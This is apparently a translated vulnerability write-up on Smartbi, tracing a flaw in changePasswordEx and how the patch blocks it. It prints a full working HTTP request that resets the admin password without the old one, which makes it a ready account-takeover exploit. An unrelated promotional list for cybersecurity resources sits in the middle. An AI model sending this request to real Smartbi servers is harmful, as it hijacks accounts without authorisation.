Vulnerability Profile
By checking the patch package information of Smartbi, it is found that there is a vulnerability to modify the user's password under certain circumstances, and perform simple reproduction and analysis
Vulnerability recurrence
When changing the password on the page, you need to know the password corresponding to the original user
Directly constructing such a data packet, you don’t need to know the original password, and you can change the password if you know the user name
POST /smartbi/vision/RMIServlet HTTP/1.1
Host: 192.168.222.133:18080
Content-Length: 73
Cache-Control: max-age=0
If-Modified-Since: 0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Origin: http://192.168.222.133:18080
Referer: http://192.168.222.133:18080/smartbi/vision/index.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=4A4AC06EC1DF3CDDC45239C211926FA1
Connection: close
className=UserService&methodName=changePasswordEx¶ms=["admin","","1"]
Vulnerability Analysis
smartbi.usermanager.ILocalUserManagerModule#changePasswordEx
smartbi.usermanager.UserManagerModule#changePasswordEx
Although the operation of changing the password obtains the new password after changing the original password of the user name, but does not perform any verification processing on the original password
Help cybersecurity study, get a full set of information S letter for free:
① Mind map of cybersecurity learning growth path
② 60+ classic cybersecurity toolkits
③ 100+ SRC analysis reports
④ 150+ e-books on cybersecurity attack and defense combat techniques
⑤ The most authoritative CISSP Certification Exam Guide + Question Bank
⑥ More than 1800 pages of CTF Practical Skills Manual
⑦ Collection of the latest interview questions from network security companies (including answers)
⑧ APP Client Security Testing Guide (Android+IOS)
userId is queried based on the incoming username
smartbi.usermanager.UserManagerModule#updateUserEx
smartbi.usermanager.UserManagerModule#updateUserExtend
Bug fixes
After uploading the patch package and then sending the data packet, it was found that it was intercepted
Execution ends when the corresponding class name and method are matched